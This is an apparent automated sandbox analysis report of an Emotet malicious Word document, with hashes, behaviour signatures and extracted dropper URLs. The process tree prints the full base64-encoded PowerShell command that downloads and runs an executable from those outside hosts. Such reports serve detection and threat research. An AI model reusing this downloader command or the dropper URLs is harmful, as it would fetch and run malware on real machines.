Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    60s
  • max time network
    9s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    19-07-2020 00:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9f1bd1e4bebe59767443c433a11f963542c021708066d5fad3f8b5bb1d6a3380.doc

  • Size

    235KB

  • MD5

    ef9fb079fa033814c89b585dd3f45a2e

  • SHA1

    e121160f9e43eaa377a627593aea7ba0bb662cf8

  • SHA256

    9f1bd1e4bebe59767443c433a11f963542c021708066d5fad3f8b5bb1d6a3380

  • SHA512

    e265082acad53da32566f32cbdc0cecc72a99476b30ee5973fd571aa183bc444eb4684c0461839d4a2f3843a5f034911a1238f5583b4e5d3bfc385cc337e4b5c

Score
10/10
discovery

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://ta-behesht.ir/images/Provx00a/
exe.dropper

http://tatcogroup.ir/wp-admin/UC/
exe.dropper

http://tcpartner.ru/wp-includes/nr8/
exe.dropper

http://tepcian.utcc.ac.th/wp-admin/SquR/
exe.dropper

http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/

Signatures

  • Modifies system certificate store 2 TTPs 9 IoCs
    evasionspywaretrojan
  • Modifies registry class 280 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Blacklisted process makes network request 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9f1bd1e4bebe59767443c433a11f963542c021708066d5fad3f8b5bb1d6a3380.doc"
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:1296
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AHEAaABsAHkAJwA7ACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBhAHoAYwB5AGoAdABiAHQAYgBoAHcAagArACcALgBlAHgAZQAnADsAJABXAGkAaABpAGoAawBiAGQAbABsAHIAPQAnAFYAbQBuAHEAcQBrAG0AaABrAGYAdgB4ACcAOwAkAEsAcQB2AGYAbwB4AHkAcABlAHoAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYwBMAEkARQBOAFQAOwAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAPQAnAGgAdAB0AHAAOgAvAC8AdABhAC0AYgBlAGgAZQBzAGgAdAAuAGkAcgAvAGkAbQBhAGcAZQBzAC8AUAByAG8AdgB4ADAAMABhAC8AKgBoAHQAdABwADoALwAvAHQAYQB0AGMAbwBnAHIAbwB1AHAALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwBVAEMALwAqAGgAdAB0AHAAOgAvAC8AdABjAHAAYQByAHQAbgBlAHIALgByAHUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBuAHIAOAAvACoAaAB0AHQAcAA6AC8ALwB0AGUAcABjAGkAYQBuAC4AdQB0AGMAYwAuAGEAYwAuAHQAaAAvAHcAcAAtAGEAZABtAGkAbgAvAFMAcQB1AFIALwAqAGgAdAB0AHAAOgAvAC8AbwB1AHIAcAByAG8AZAB1AGMAdAByAGUAdgBpAGUAdwAuAGkAbgAvAHAAbwBrAGoAYgBnADcANAA2AGkAaAByAHQAcgAvAGEAMQBrAHoAdwBjAC8AJwAuACIAcwBQAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAHIAeQBuAGkAaABxAHgAYwBxAG4AcAA9ACcASABrAGQAawB6AGgAegBrAGMAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGgAaQBwAHMAdgB3AHAAIABpAG4AIAAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAKQB7AHQAcgB5AHsAJABLAHEAdgBmAG8AeAB5AHAAZQB6AC4AIgBkAE8AdwBuAEwAYABPAGAAQQBEAEYASQBsAGUAIgAoACQAWABoAGkAcABzAHYAdwBwACwAIAAkAEQAagBhAGEAbwB1AHMAdwBuAGIAcgBoAHkAKQA7ACQASgBtAGMAbABrAGoAcQBwAD0AJwBYAGkAaQBhAHgAawB3AGMAYQB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADMANwA0ADMAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAFQAZQAiACgAJABEAGoAYQBhAG8AdQBzAHcAbgBiAHIAaAB5ACkAOwAkAEMAawB4AHMAdQBjAG8AaABzAHQAYwBoAGwAPQAnAEMAZwB4AGEAdgB4AGYAYgByACcAOwBiAHIAZQBhAGsAOwAkAFoAZwBvAHYAcgBoAGoAbQA9ACcATQBxAHYAbgB4AGYAZgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AbAByAHoAdAB6AHYAZQBjAHcAagBnAD0AJwBDAGkAcwB3AGMAdgB4AHkAegBlAHEAcQAnAA==
    1⤵
    • Modifies system certificate store
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    PID:1068

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1296-2-0x0000000008830000-0x0000000008834000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1296-5-0x000000000AA70000-0x000000000AA74000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1296-6-0x000000000BAF0000-0x000000000BAF4000-memory.dmp

    Filesize

    16KB

    Download